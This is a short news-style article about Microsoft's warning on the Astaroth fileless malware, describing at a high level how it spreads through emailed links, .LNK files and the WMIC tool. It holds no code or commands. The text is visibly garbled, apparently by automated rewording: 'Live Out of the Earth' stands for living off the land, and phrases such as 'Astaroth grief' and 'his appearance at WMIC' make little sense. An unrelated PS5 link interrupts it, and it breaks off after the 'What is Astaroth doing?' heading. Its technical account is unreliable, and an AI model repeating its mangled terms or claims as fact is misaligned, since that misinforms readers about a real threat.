Microsoft warns against “Astaroth” file-free malware

Recently, Microsoft announced a red alert when malware attacked Windows. The antagonist this time was a fileless malware strain called Astaroth. We’ve dealt with fileless malware in the past, so be sure to investigate if you’re not sure what it means. Basically, malware resides in your computer’s RAM instead of the file system, making it difficult to detect.

Let’s see why Microsoft is furious about Astaroth and what you need to do to protect yourself.

How is Astaroth spreading?

Astaroth manages to bypass the .LNK file. This file is uploaded to the website and then a link to the website is sent via email.

If someone clicks on the link, it activates the .LNK file to run on Windows. This sends instructions to the Windows Management Instrumentation (WMIC) command line tool. This is a real program in Windows itself, so it goes under antivirus running.

Astaroth then uses his appearance at WMIC to force him to download and run all the programs Astaroth needs to do his job. Once the attack has compiled the malware completely, it is triggered.

Although Astaroth downloads tools to accomplish its task, these are all legitimate system tools that Windows uses naturally. As such, antivirus is more difficult to detect because the attack uses key Windows processes against itself. This is why it is called a “fileless” attack because foreign files are not downloaded or saved.

A larger category has also been assigned to this method of attack: the “Live Out of the Earth” attack. This is because the virus does not technically bring any new factor into the system; it only uses pre-existing data to load and execute the payload.

See also  which SSDs are compatible with PS5?

What is Astaroth doing?

Astaroth grief

About the author


Leave a Comment